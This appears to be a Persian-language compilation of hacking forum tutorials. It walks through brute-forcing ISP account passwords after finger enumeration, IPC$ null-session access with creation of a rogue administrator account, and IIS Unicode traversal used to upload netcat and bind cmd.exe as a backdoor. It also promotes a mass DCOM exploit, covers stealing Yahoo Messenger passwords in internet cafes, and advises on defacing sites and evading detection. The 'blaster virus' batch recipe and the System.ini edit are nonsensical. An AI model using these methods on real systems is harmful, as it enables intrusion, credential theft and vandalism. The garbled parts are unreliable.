حمله: Brute Force
از طریق پورت: ۷۹
معمولا ISPها یوزرنیم های یکی میزنن. یعنی فقط رقم آخرشون فرق داره. خوب شما هم در اینجا به یه یوزرنیم احتیاج دارین که اگه یه اکانت داشته باشین می تونید راحت حدس بزنید(اگه باشه بهتره). البته اگر هم بلد نبودید می تونید از روش زیر برای پیدا کردن یوزرنیم استفاده کنید:
خوب، حالا طرز کار پورت ۷۹ رو یاد بگیرین.
دکمه ی start رو بزنید و گزینه ی Run رو انتخاب کنید. حالا تایپ کنید cmd یا command و بعد Enter رو بزنید.
در داخل cmd برای بحث در رابطه با پورت ها از دو فرمان telnet و nc استفاده می کنیم. حالا به طور مثال اگه شما بخواین با پورت ۷۹ به سرور شرکت به طور مثال کایر کانکت شین و از اون جا اکانت کش برین، باید با اون جا ارتباط برقرار کنین، از یکی از فرامین زیر استفاده کنید:
telnet kayernet.com 79
nc -v kayernet.com 79
finger .@kayernet.com
اگه شما به سرور مورد نظرتون وصل شدید فرامین زیر رو می بینید:
Line User Host(s) Idle Location
33 tty 33 whgh Async interface 0
34 tty 34 najahan Async interface 0
35 tty 35 sadf Async interface 0
36 tty 36 abokho Async interface 0
38 tty 38 whgh Async interface 0
39 tty 39 bzamani Async interface 0
40 tty 40 saeedmah Async interface 0
41 tty 41 mfaizi Async interface 0
42 tty 42 gourabi Async interface 0
43 tty 43 farhadz Async interface 0
44 tty 44 arbks Async interface 0
45 tty 45 mhalavi Async interface 0
46 tty 46 farhood Async interface 0
47 tty 47 staavoni Async interface 0
48 tty 48 whgh Async interface 0
* 66 vty 0 idle 0 217.218.84.58
Interface User Mode Idle Peer Address
نکته: فرمان finger مخصوص پورت ۷۹ هستش. بنابراین دیگه لازم نیست شماره پورت رو بنویسید.
این دستورات می خوان اکانت هایی که الان کانکت هستن رو بهتون بگن که شما فقط یوزرنیم اونا رو مشاهده می کنین. البته این اطلاعات بستگی به نوع سرور داره. بعضی از سرورها مشخصات کامل تری می دن.
حالا شما یوزر نیم دارین. حالا وقته اینه که نرم افزار Unsecurev1.2 رو دانلود کنین. زمانی که فایل رو دانلود کردید چندین قسمت می بینید که من همه ی اون ها رو برای شما شرح می دم.
computer name or ip
آي پي و يا سايت اون آي سي پي كه ازش می خواین اکانت بگیرین
در قسمت پورت هم 21 رو مينويسيد كه
از پورت 79 هم می تونيد اگه باز بود استفاده كنين
curent password
لطفا به این محل دست نزنید
در قيمت يوزرنيم شما بايد يه
يوزر حدس بزنيد كه كار زياد سختي نيست چون تمام اي سي پي ها از يه رنج
خاصي استفاده ميكند مثلا شركت دونا کایر، یوزر نیم های بعضی کارت های ۵ ساعتش به صورت زیره:
5nddx5n091
5nddx5n092
5nddx5n093
5nddx5n094
5nddx5n095
dictionary file
آدرس یه پسورد لیست از کامپیوتر خودتون (در آخر یه دونه از اونا رو واسه دانلود می زارم) رو بدین. البته شما با دیکشنری میکر یه پسورد لیت بسازین.
attack option
هر 4 گزينه رو کلیک کنین
brute furce option
تو این قسمت مشخص می كنين كه فايل چطوري دنبال پسورد بگرده. مثلا حرف اول اون با عدد يا حرف شروع ميشه يا تعداد حروف پسورد چندتا هستش و ... .
حالا کانکت رو بزنید و صبر کنید تا پسورد یوزرنیم شما رو پیدا کنه
نکته: من هیچ گونه مسولیتی در قبال سوء استفاده از این مطالب ندارم

يكي از مشكلات بزرگ ويندوز كه در Service pack هاي ويندوز هم وجود داره IPC هست

حالا ما با استفاده از اين روش كارمون را شروع ميكنيم .

يكي از نرم افزار هاي مورد نياز GFI:LANguard Security Scaner هست كه بخاطر قدرت و كارايي اين برنامه را پيشنهاد ميكنم كه فقط بايد يكسري

تغييرات رو روي آن انجام بدين اين برنامه را از سايت زير داونلود كنيد:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Serial:6J7FF-OL03J-9OHQB-1Q0XZ-F7PLZKH5TY-K1GSN-7BT5F-78A0B-CSKYU

البته ورژن 3.3 هم هست ولي من ورژن 3.2 را پيشنهاد ميكنم كه در سايت بالا ورژن 3.2 وجود دارد و سريال بالا نيز مربوط به همين ورژن هست

حالا بايد يكسري تغييرات در اين برنامه بديم .

1.option را انتخاب كنيد و به قسمت Scanning برويد و اين شاخه را انتخاب كنيد Configure ports و حالا در قسمت

Port number/range:1025

port desciription:network blackjacket

و حالا ADD PORT را بزنيد .

در قسمت New scan بايد يك Range اي پي رو اسكن كنيد تا يك اي پي با مشخصات زير پيدا شود

پرت هاي باز 1025,139 را داشته باشد .

IPC share نيز داشته باشد

حالا بايد به اين اي پي به صورت زير كانكت شويد :

1.در قسمت Run اين جمله را وارد كنيد CMD

2. دستور زير را وارد كنيد :

Net use IpadressIPC$""/user:Administrator

اگر دستور زير را دريافت كردين

Successfully The Command was completed

از اي پي مورد نظر Share گرفتين و در اختيار شماست اما در غير اينصورت Share داراي پسوورد ميباشد كه من براي كرك كردن پسسوورد از اين برنامه

استقاده ميكنم :

PQWAK

كه اين برنامه رو از سايت Download.com دريافت كنيد .

بعد از كرك از پسوورد بدست آمده اينگونه استفاده كنيد

Net use ipadressIPC$ "password"/user:administrator

در صورتيكه ميخواهيد با Telnet كانكت شويد مراحل زير را طي كنيد .

در قسمت RUN تايپ كنيد Regedit

به اين آدرس برويد HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet NTLMServer--1.0

حالا Value date اين فايل رو به اين جمله تغيير دهيد : 12

در قسمت بعدي به RUN برويد و اين دستور را تايپ كنيد TELNET

دستور زير را وارد كنيد Telnet ipadress

در ادامه اگر از شما يوزر و پسوورد خواست يوزر را Administrator و پسسورد را خالي بگذاريد

حالا احتياج به ساختن يك يوزر براي خود داريد . اين دستور را در ادامه وارد كنيد :

Net user username password/add

حالا براي قرار دادن يوزر خود در گروه ادمين ها اين دستور را وارد كنيد

Net groups Administrators username/add

تمام شد شما به هدف خود رسيده ايد اما من براي تازه كارها روش اول را پيشنهاد ميكنم

ولي دوستان ديگر ميتوانند از Telnet استفاده كنند

نكته : من هيچ مسئوليتي در مورد تغيير رجيستري نميپذيرم اگر شما قادر به Edit رجيستري نيستيد بهتره از آن يه Backup تهيه كنيد يا

در نهايت از روش اول استفاده كنيد

با عرض سلام.امروز بهترین روش هک کردن سایت رو بهتون هدیه می کنم. سعي کرديم که کار با نت کت را براي شما واضح کنيم . خوب من در اين آموزش بصورت آنلاين ميخوام با نتکت يک سايت رو هک و ديفيس کنم که در اين آموزش شما کلا ميتونيد اين رو ياد بگيريد.

خوب در اين مثال من پورتهاي باز از شماره 1 تا 200 را اسکن کردم و فهميدم که روي اين ماشين پورتهاي 135و80و25و21و20 باز هستش .
خوب الآن من ميخوام بدونم که در پشت پورتهاي 80 و 21 چه برنامه هايي در حال اجرا هستند .


خوب الان مشاهده ميکنيم که FTP Service يعني پورت 21 احتمالا ويندوز 2000 و IIS5.0 روي آن در حال اجرا هست . خوب الآن فکر کنم بدونيد که کلا IIS يکي از پر مشکل ترين پروتکلهاست و در ضمن اين سرويس از ويندوز 2000 استفاده ميکنه و احتمال اينکه Webdav روي اين سرويس فعال باشه 80% است که من آموزش هک با Webdav هم توي سايت گذاشتم. خوب الآن سعي ميکنيم با فرستادن داده هاي نامتعارف که شايد روي IIS اصلاح نشده اند از آن استفاده کنيم . شايد توانستيم از آنها استفاده کنيم !!! چون آي آي اس از اين گونه ضعفها بسيار دارد ما نت کت را بر عليه اين ضعف به کار ميگيريم و اگر به جواب مورد نظر خود رسيديم نت کت را روي آي آي اس آپلود ميکنيم و از آن بصورت يک بکدور استفاده ميکنيم . اگر شما اطلاعاتي از اکسپلويتهاي Unicode File Traversal نداريد با يک جستجو در مورد IIS Unicode File Traversal به نتايج جالبي خواهيد رسيد . که اين نوع آموزشها را در قسمت گوگل هکينگ توضيح داده ام . شما بوسيله اين دسته از اکسپلويتها خواهيد توانست Break Out کرده و يا بشکنيد . و به شاخه c:\inetput\[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] دسترسي داشته باشيد و برنامه هايتان را فرستاده و يا اجرا کنيد (از طريق کامپيوتر خود) . خوب يه توضيح کوچيک ميدم که اميدوارم حواستون پرت نشده باشه با اين مباحث متفرقه بايد بگم که اين مقاله راجب هک آي آي اس نيست بلکه راجب هک سايت با نت کت است و تا اينجا فعلا از بحثهاي متفرقه اي که باز شد بيايد بيرون و حواستون رو سر بحث اصلي خود بگذاريد . خوب در شکل زير ميبينيد که از همين طريقي که گفتم من به پوشه مورد نظر دسترسي پيدا کردم . ما اين رشته رو براي آي آي اس فرستاديم و اون هم اصلاح نشده بود و در نتيجه در دام ما افتاد و .

خوب تازه ما ميخوايم شروع کنيم و نتکت رو به دايرکتوري ريشه منتقل کنيم و از آن استفاده کنيم / خوب حالا اميدوارم که همگي با TFTP آشنايي داشته باشيد . خوب ما بوسيله اين اکسپلويت نتکت رو آپلود ميکنيم و دقت کنيد که براي درخواستها از علامت + استفاده ميکنيم . براي اينکه کاملا متوجه شويد دقيقا شکل زير رو ببينيد .

Tftp -I 192.168.1.2 GET nc.exe
در حال ترانسفر شدن است به [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ][exploit url]/c+TFTP+-i+192.168.1.2+get+nc.exe خوب الان اگر نتکت به درستي آپلود شود شما پيغامي بر همين مبنا که نتکت با موفقيت فرستاده شد را دريافت خواهيد کرد . مانند شکل زير :

استفاده به عنوان بک دور
خوب تا اينجا که کار ما راحت شده . ما نتکت رو آپلود کرديم و الآن ميخواهيم از آن به عنوان يک بکدور استفاده کنيم تا بتونيم يک ارتباط از راه دور با آن برقرار کنيم . اگر مايل به اين کار باشيم صحيح ترين کار اين است که نتکت رو در حالت ليستنر روي آي آي اس روي پورت 10001 آماده کنيم . تا به ماشين قرباني وصل شويم يعني ما بجاي کلاينت قرار بگيريم . دستورات ما براي اين کار چيزي شبيه به اين خواهند بود :
nc -l -p 10001 -d -e cmd.exe
خوب الآن دستوراتي که ما براي اجراي نتکت احتياج داريم در طرف مقابل ما براي CMD را اجرا کنيم تا به نتکت دسترسي داشته باشيم براي اين کار ما بايد از دستورات زير استفاده کنيم :
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ][exploit url]/c+nc+-l+-p+10001+-d+-e+cmd.exe
و الآن ما ميتونيم که نت کت رو اجرا کنيم و بقول خودمونيا حالشو ببريم :

exploit url ]
اين کار باعث ميشه که نتکت روي پورت آي آي اس 10001 فعال شود و بصورت کلاينت شما به آن وصل شويد . و الآن آيپي خودتون رو با دستور ipconfig بدست آورده و به عنوان کلاينت به Nc که در سرور IIS در حال گوش دادن به پورت 10001 ميباشد وصل ميشويد . و در اونجا هم ميتونيد از همين دستورات استفاده کنيد . در شکل زير شاهد جزييات کامل خواهيد بود .

خوب الآن ما به شل دسترسي مستقيم داريم و ميتونيم هر کاري که عشقمونه روي سرور انجام بديم .
فرستادن فايل بوسيله NC
همونطور که در آموزشهاي قبل گفتم فرستادن فايل يکي از قابليتهاي ويژه نتکت است که به اين صورت قابل انجام است . و الآن ميخوام که بدون توضيحات اضافي برم سر اصل مطلب . در کامپيوتر قرباني:
NC -l -p 1234>----.txt

در کامپيوتر خودمان :
Nc destination 1234<----.TXT< FONT>

فرستادن کاراکتر C^ يعني فايلتون با موفقيت ترنسفر شده است . فايل شما ميتونه يک چيزي شبيه به اين باشه :

ما حتا ميتونيم فايل فرستاده شده خودمون رو در طرف قرباني ببينيم . اين کار از طريق پورت 1234 انجام ميشود . البته اسم اين فايل در اکثر مواقع index.htm است .

اميدوارم که اين مقاله هم مورد استفاده قرار گرفته باشه

هك و اكسپلويت

با کمک اين exploit که از باگ dcom استفاده مي کند مي توانيد روي يک رنج ip بدون انجام هيچ کاري وارد سيستم قرباني شويد .بدون داشتن هيچ اطلاعاتي از هک و ارتباط قبلي با قرباني .البته اين باگ ازباگ هاي قديميه ولي هنوز کار مي کنه و چون مي خواستيم که شروعي باشه براي ارائه ي باگ هاي کامپايل شده ي جديد که بزودي تو سايت ارائه مي شه . براي کار با اين باگ بعد از داونلود در درايو c خودتون کپيش کنيد و بعد به منوي استارت بريد و در run رفته cmd را تايپ کنيد .بعد از ورود به cmd و با داشتن ip خود به طور مثال ip من 217.218.190.55 هستش ميرم تو command prompt مينويسم C:>kaht2.exe 217.218.190.1 217.218.190.254 که با اين کار برنامه اين رنج را براي پيدا کردن سيستم هاي نفوذ پذير چک مي کند و وارد آن ها مي شود و خط فرمان آن ها را در اختيار شما قرار مي دهد (از آن ها شل مي گيرد)

نکته: من هیچ گونه مسولیتی در قبال این اموزش ندارم و صرفا اموزشی می باشد.
برای افرادی که از هک آگاهی چندانی ندارند این کار بسیار خطرناکه اگه از هک چیزی نمیدونی اینو نخون حالا از ما گفتن از شما نشنیدن تونش دیگه به من ربطی نداره .
برای هک کردن سایت همرا من باشین :
۱) ابتدا بعد از اتصال به شبکه در قسمت داس ویندوز علائم زیر را تایپ کنین :
C:\<>
2)بجای domain-name اسم سایتی که میخواهین هکش کنین مینویسی.اگه پورت 79 که در آخر سایت نوشته میشود باز بود شما میتونین وارد بشین و گرنه نمیشه اگه بسته بود به پورت 21 هم سری بزنین .
3) اگه پورت باز بود شما وارد میشین و یعد از وارد شدن شروع به خراب کاری میکنی حالا چه بلایی سرش بیاری اونش دیگه به من ربطی نداره چه میخوای بکنی.
**توجه ** ** توجه **
1) اگه در هنگام خراب کاری متوجه شدین که سرعت سیستمتون کاهش یافته سری خارج بشین.
2) اگه میترسی که پیدات کنن بعد از خراب کاری ریست نکنین اول دیسکانکت میشین و بعد ریست میکنین .
3) بازم میگم اگه چیزی از فرمانهای داس نمیدونی اصلا" اینو نخون .
4) نکته خیلی مهم اینکه من هیچ مسئولیتی در قبال خراب کاریاتون ندارم

تا الآن بد ترین و آزار دهنده ترین ویرو سی که در دنیا معرفی شده ویروس کرم ریزه که نامش blaster&saser
است.این ویروس سی پی یو فرد قربانی رو میسوزونه.
من آموزش ساختن این ویروس رو به تویاد میدم.
۱:روی دسک تاپ رایت کلیک کنید.
۲:رو انتخاب کنید.new
۳: رو انتخاب کنیدtext doceument
۴:حالا وارد تکست داکیومنت خود شوید و در آن تایپ کنید
۵: cpu_567hjkblaster
6حالا ان را با پسوند bat سيو كنيد
۷: یک اسم دلخواه برای آن فایل بگذارید.
۸:بعد این فایل رو برای یکی بفرستید
اخطار: اگر سی پی یو تو نو دوست دارین به هیچ وجه این فایل رو روی دستگاه خود اجرا نکنید

با این کار شما می توانید IP یک سایت مثل یاهو رو پیدا کنید.از منوی start وارد Run شده و تایپ کنید cmd
حالا تایپ کنید ping yahoo.com چند لحظه بعد IP سایت یاهو به شما نشان داده می شود.شما می توانید
آدرس هر سایت دیگری را به جای yahoo.com وارد کنید.همچنین لازم نیست که در ابتدای آدرس سایت www را بنویسید

سلام
اينو در يك pm يا در yahoo وارد كنيد
با رنگ قرمز و فونت بزرگ
<font face="webdings"><font size="6"><font color="FF6666">Y<font size="10"><font color="6600FF">Y<font size="14"><font color="FF0099">Y<font size="18"><font color="33CC33">Y<font size="22"><font color="FFFF33">Y<font size="26"><font color="990099">Y<font size="26"><font color="990099">Y<font size="22"><font color="FFFF33">Y<font size="18"><font color="33CC33">Y<font size="14"><font color="FF0099">Y<font size="10"><font color="6600FF">Y<font size="6"><font color="FF6666">Y

سلام دوستان

ما در
یک کافینت که تمامی سیستم های آن باهم شبکه هستن وصل شویم
ما می خواهیم که از طریق یک سیستم به تمامی سیستم های آن شبکه متصل شویم
برای این کار ما باید از نرم افزار خود ویندوز استفاده کنیم
برای شروع کار ازمنوی Start برنامهMy Network Places را انتخاب کنید و در My Network Places
تعدادی پوشه وجود دارد که هر کدام مربوت به سیستم ها که در آن شبکه وجود دارد می باشد
وشما درایو سیستم آمل هر یک ازاین سیستم ها در اختیار دارید

سلام
ذخیره شدن پسورد و ایدی در کامپیوتر خودتان:
از منوي Start گزينه Run را انتخاب كنيد و Regedit را تايپ كنيد تا داخل محيط ويرايش ريجستري شويد حالا به اين كليك در ريجستري برويد

HKEY_CURRENT_USER\Software\Yahoo\Pager و روی Save Password دو بار كليد كنيد و عدد 100 را در آن تايپ كنيد و OK بزنيد حالا ياهو مسنجر را نگاه كنيد آخرين ID و Password ID می بينيد می توانيد باآن Login بشويد . حال بايد يك برنامه كه از قبل آمده كرده باشيد كه پسورد روي ويندوز را بخواند(007) كه با آن بتوانيد پسورد درون ياهو مسنجر را بخوانيد. اين كار شما مي توانيد در كافي نت انجام بدهيد چون پسورد شخص قبلي كسي كه قبل از شما كار مي كرده اگر هم پسورد هم Save نكرده باشه مي توانيد در بياوريد .

توجه : شما مي خواهيد اين كار را در كافي نت انجام بدهيد اما مي بينيد هر چي Regedit را در Run تايپ مي كنيد ويندوز Error به شما مي دهد اين به آن معنا است كه رجستري ويندوز پسورد داره پس شما بيايد به جاي Regedit اين را regedt32 تايپ كنيد.

اول بگردين فايل System.ini رو پيدا کنيد . برای اين کار می تونيد از در ويندوز از سرج استفاده
کنيد ...
بعد اونو باز کنيد و دنبال [386enh] بگرديد ...
بعد اين دستورات رو بهش اضافه کنيد و به همين صورت سيو کنيد :
Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
woafont=dosapp.FON

البته مطالب بالا رو که گفتم شما به خاطر فارسی بودن صفحات برعکس ميبينيد که اگه تو پرونده مورد نظر کپی کنيد بايد سمت راست باشه !
البته متن را باید در خط بعد از [386enh] تایپ کنید یعنی به این صورت
[386enh]
Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
woafont=dosapp.FON
يا
386enh]
Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
[woafont=dosapp.FON

هک - قسمت اول


درس اول

هک چی بيده و هکر کی بيده؟هکر به کسی که از رايانه اطلاعاتی دارد و می تواند بدون اجازه وارد سيستم های کامپيوتری شود

چه چيزايي رو ياد بگيريم؟ اول از همه تی سی پی/آی پی دوم ويندوز 2000 و لينوکس

برای زنگ های تفريح بين درس ها من از مسايل هک غير مربوط استفاده می کنم مثلا آموزش داشتن اينترنت رايگان و اين جور مسايل

از تمامی عزيزانی که در زمينه ی هک يه جورايي (مثل من)هستن درخواست می شه به من کمک کنن حتی اگر اولين بارشونه که می هوان يه نفر رو هک کنن من به اونا هم کمک می کنم



درس دوم

اواين چيزی که يه هکر بايد بلد باشه پيدا کردنه آی پی طرف مقابله(برای کلاينت)پيدا کردن آی پی می تونه تو چت باشه و يا از طريق های ديگر ولی من چند نوع پيدا کردن آی پی رو به شما می گم حتما می پرسين آ پی چيه؟آی پی به آدرس هايي گفته می شود که در اينترنت کاربرد دارند مثلا داده ها در اينترنت از طريق همين آی پی ها منتقل می شه يعنی آی پی يه نوع آدرس اينترنتی است که در هر دفعه اتصال به اينترنت تغيير می کند و يه عددی مثل 125.124.23.26 اولين راهی که برای پيدا کردن آی پی به ذهن يه هکر در چت می افته استفاده از دستور زيره يعنی

netstat

خب وقتی اين دستور را در کامند پرومنت تايپ کنيد در صورتی که اينترنت قطع باشد نتايج زير حاصل می شود و اگر هم وصل باشد آی پی ها نمايش داده می شود

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

D:\>netstat

Active Connections Proto Local Address Foreign Address State

در شکل اينترنت من قطع بوده است و می بينيد که هيچ آدرسی نمايش داده نمی شود ولی اگر اينترنت وصل بود و من هم در حال چت با فردی بودم آی پی او نمايش داده می شه ولی الان خالی هست خب پيدا کردن آی پی در چت رو گفتم اما چه جوری آی پی يه سايت رو پيدا کنيم برای اطن کار دو روش وجود داره اولی اينه که به سايت پينگ کنيم و دومی هم هوايز کردن سايت است که روش هر دو اين زير هست ولی برای تمامی سايت ها هوايز کردن بهتره چون نتيجه ی بهتری را در بر دارد

ping site name

روش بالا برای هر سايتی قابل استفاده است مثلا به مثال زير توجه کنيد

ping persianblog.com

دقت کنيد که ما نام سايت را وارد می کنيم و با استفاده از اين روش به نتايج زير رسيديم

pinging persianblog.com [xxx.yyy.zzz.nnn] with 32 bytes of data:

Reply from xxx.yyy.zzz.nnn bytes=32 time=821ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=821ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=822ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=811ms TTL =111


Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 811ms, Maximum = 822ms, Average = 818ms

می باشدxxx.yyy.zzz.nnnملاحظه می کنيد که آی پی پرشين بلاگ

برای روش دوم هم به مثال زير توجه کنيد

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بعد از زدن اينتر اطلاعات زير نمايش داده می شود

whois -h magic xxx.yyy.zzz.nnn
sazin.com resolves toxxx.yyy.zzz.nnn

Trying whois -h whois.arin.net xxx.yyy.zzz.nnn
Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1)
63.144.0.0 - 63.151.255.255
Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1)
63.148.224.0 - 63.148.231.255

# ARIN Whois database, last updated 2002-09-04 19:05
# Enter ? for additional hints on searching ARIN's Whois database.

در دو سطر اول آی پی طرف مقابل(سايت)مشخص می شود

سايت های معروف اين کار

whois.internic.net (The InterNIC)
whois.onlinenic.com (The OnLineNIC)
whois.arin.net (American Registry for Internet Numbers)
whois.ripe.net (European IP Address Allocations)
whois.apnic.net (European IP Address Allocations)
whois.nic.mil (US Military)
whois.nic.gov (US Government)

ولی همون اولی که مثال زدم از همه بهتره می گی نه نگاه کن
بعد اين می رسيم به پيدا کردن آی پی کلاينت برای اين کار چند روش وجود دارد که شما می توانيد يکی از اين روش ها را برگزينيد البته با ساب سون نيز می شود اما قبلا بايد او را هک
کرده باشيد جالا مراحل زير را دنبال کنين تا آخر
اولين راه فرستادن فايله که اول بايد از مهندسی اجتماعی استفاده کنيد تا به شما اعتماد کنه و گر نه که قيد اينو بزنين
در کامند پرومنت است که در بالا گفتم Netstat -n راه دوم نوشتن دستور
اين دستور بيشتر در چت کاربرد دارد
راه سوم هم زدن مخه يعنی سريش بازی در آوردن
و راه حل آخر هم که برای مسخره بازی نوشتم پرسيدن آی پی از طرفه(چقدر بامزه)مسخره بود نه
اگه کسی سوالی داره بگه من منتظرم

هک - قسمت دوم

درس سوم

قسمت قبلی رو که حتما خوندین !

بعد از اون چیزایی که در قسمت اول گفتم می رسيم به مشخص کردن پورت های باز بر روی سرور و يا کلاينت

برای اين کار چند روش وجود دارد ابتدا برای سايت ما می توانيم از دو روش معمول و معقولانه استفاده کنيم اين دو روش که در زير آمده است
برای اين است که ما ببينيم که پورت هايي که ما می خواهيم روی آن سرور باز است يا نه ؟ دستورش هم اين جوری بيدهtelnetاولين روش استفاده از
telnet site name port number
لابد می پرسيد که ديگه پورت چيه؟پورت به طور کلی به درگاه های ورودی و خروجی کامپيوتر گفته می شود که همه منطقی هستند و وجود خارجی ندارند در هر سيستم 65535 عددد پورت تی سی پی و 65535 عدد پورت يو دی پی وجود دارد که همه منطقی هستند(کامپيوتر چقدر منطقی هست)ليست پورت ها اين زير هست بخونينش براتون مفيده (هر کی بتونه همشونو حفظ کنه یه جایزه پیش من داره)

Ports TCP/UDP Service or Application
------- ------------ ---------- -- ----------------
7 tcp echo
11 tcp systat
19 tcp chargen
21 tcp ftp-data
22 tcp ssh
23 tcp telnet
25 tcp smtp
42 tcp nameserver
43 tcp whois
49 udp tacacs
53 udp dns-lookup
53 tcp dns-zone
66 tcp oracle-sqlnet
69 udp tftp
79 tcp finger
80 tcp http
81 tcp alternative for http
88 tcp kerberos or alternative for http
109 tcp pop2
110 tcp pop3
111 tcp sunrpc
118 tcp sqlserv
119 tcp nntp
135 tcp ntrpc-or-dec
139 tcp netbios
143 tcp imap
161 udp snmp
162 udp snmp-trap
179 tcp bgp
256 tcp snmp-checkpoint
389 tcp ldap
396 tcp netware-ip
407 tcp timbuktu
443 tcp [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
445 tcp ms-smb-alternate
445 udp ms-smb-alternate
500 udp ipsec-internet-key-exchange (ike)
513 tcp rlogin
513 udp rwho
514 tcp rshell
514 udp syslog
515 tcp printer
515 udp printer
520 udp router
524 tcp netware-ncp
799 tcp remotely possible
1080 tcp socks
1313 tcp bmc-patrol-db
1352 tcp notes
1433 tcp ms-sql
1494 tcp citrix
1498 tcp sybase-sql-anywhere
1524 tcp ingres-lock
1525 tcp oracle-srv
1527 tcp oracle-tli
1723 tcp pptp
1745 tcp winsock-proxy
2000 tcp remotely-anywhere
2001 tcp cisco-mgmt
2049 tcp nfs
2301 tcp compaq-web
2447 tcp openview
2998 tcp realsecure
3268 tcp ms-active-dir-global-catalog
3268 udp ms-active-dir-global-catalog
3300 tcp bmc-patrol-agent
3306 tcp mysql
3351 tcp ssql
3389 tcp ms-termserv
4001 tcp cisco-mgmt
4045 tcp nfs-lockd
5631 tcp pcanywhere
5800 tcp vnc
6000 tcp xwindows
6001 tcp cisco-mgmt
6549 tcp apc
6667 tcp irc
8000 tcp web
8001 tcp web
8002 tcp web
8080 tcp web
9001 tcp cisco-xremote
12345 tcp netbus
26000 tcp quake
31337 udp backorifice
32771 tcp rpc-solaris
32780 udp snmp-solaris
43188 tcp reachout
65301 tcp pcanywhere-def

اگر بعد از خوندن قاطی کردین اشکالی نداره همه این طوری میشن !(حال همتونو می دونم) اما زیاد ناراحت یاد گیریه اینا هم نباشید . فعلا پورت های مهم برای ما پورت های 7، 15، 21، 23، 25، 79،80،110و119 هستند .
حالا دانلود کنا بیان جلو ! خب حالا می رسيم به مبحث تعيين پورت باز که يه نمونه رو گفتم حالا با استفاده از نرم افزار می خواهيم اين کار را بکنيم

Nmap

هر کی میخواد آدرس سایتشو بدونه دستشو ببره بالا [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



درس چهارم

خب حالا ما اين اطلاعات رو پيدا کرديم با اينا چی کار کنيم؟
خب عزيزان(تحويلم بگيرين)بعد از استفاده از اون کاری که در درس قبل گفتم می رسيم به چگونگی استفاده از اين اطلاعات خب يه دور اين زيريا رو مرور کنين تا بعدش بهتون بگم :
در اين جور اطلاعات می توانيد قسمت های زير را بيابيد
نام شرکت
نام حوزه
آدرس آی پی
و يه سری اطلاعاتی که به درد ما نمی خوره(اين اطلاعات رو سايت می ده برين ببينين)در اينجا يه سری اطلاعات در مورد نام و اين جور مسايل داده می شه که زياد مورد استفاده قرار نمی گيره
در واقع مبحثی که من بالا مطرح کردم مبحث تکميلی درس قبل بود می دونين ديگه اما درس جديد از اينجا شروع می شه نه از اون جا حالا اينا رو هم بخونين ضرر نداره
اگه شما از اينترنيک استفاده کرديد که سط آخر نوشته دی اِن اِس و جلوش آدرس آی پی رو نوشته شما با استفاده از اون می تونين به ادامه ی کار بپردازيد اما چون اين سايت از همه راحت تر و در عين حال کامل تر بود براتون می گم خب حالا کار های زير رو روش انجام بدين و نتيجه رو ببينين
در خط دی اِن اِس سرور نام سرور ها نوشته شده است مثلا سرور1،سرور2 و ....حالا شما با استفاده از دستورات زير می تونين يه اطلاعات ديگری به دست بيارين حالا شروع می کنيم
کامنت پرومنت را باز کنيد و دستورات زير را درونش بنوسيد (یادتون نره خوش خط)

c:\>nslookup

با تايپ دستور زير نتايج زير حاصل می شود خودتون ببينيد
*** Can't find server name for address 192.168.20.3: Non-exi...
*** Can't find server name for address 192.168.20.1: Non-exi...
*** Default servers are not available
Default Server: UnKnown
Address: xxx.yyy.zzz.nnn

<

دقت کنيد که علامت > را حتما داشته باشه بعد از اين کار هم دستو زير را تايپ کنين تا يه چيز جديد ياد بگيرين

server dns_server <

شما به جای دی اِن اِس_سرور نام دی اِن اِس سروری که در کار قبل ياد گرفتين و حتما انجام دادين را بزارين بعد از زدن اينتر نتايج زير حاصل می شود

Default Server: site name.com
Address: xxx.yyy.zzz.nnn

در جاهايي که سايت نيم نوشتم چون ممکنه تغيير بکنه برای همين همه رو يکی نوشتم
بعدش اينو بنويسين اگه خطا گرفت دوباره دستور را تايپ کنين و يا از يکی ديگه سروراستفاده کنين

set type=any <

حالا بستگی داره خطا بگيره يا نه اگه گرفت از بقيه اينا استفاده کنين اما اگه نگرفت اينا رو ادامه بدين

ls -d site_name <

و درآخر هم اينا رو گير ميارين حال بماند به چه کار ميان

[s1.site name.com]
site name.com. SOA s1.site name.com admin.site name.com.
(2002070412 3600 600 86400 3600)
site name.com. A xxx.yyy.zzz.nnn
site name.com. NS s1.site name.com
site name.com. NS s2.site name.com
site name.com. MX 10 mail.site name.com
site name.com. MX 15 site name.com
ftp CNAME xxx.yyy.zzz.nnn
www CNAME site name.com
site name.com. SOA s1.site name.com admin.site name.com.
(2002070412 3600 600 86400 3600)
<


درس پنجم


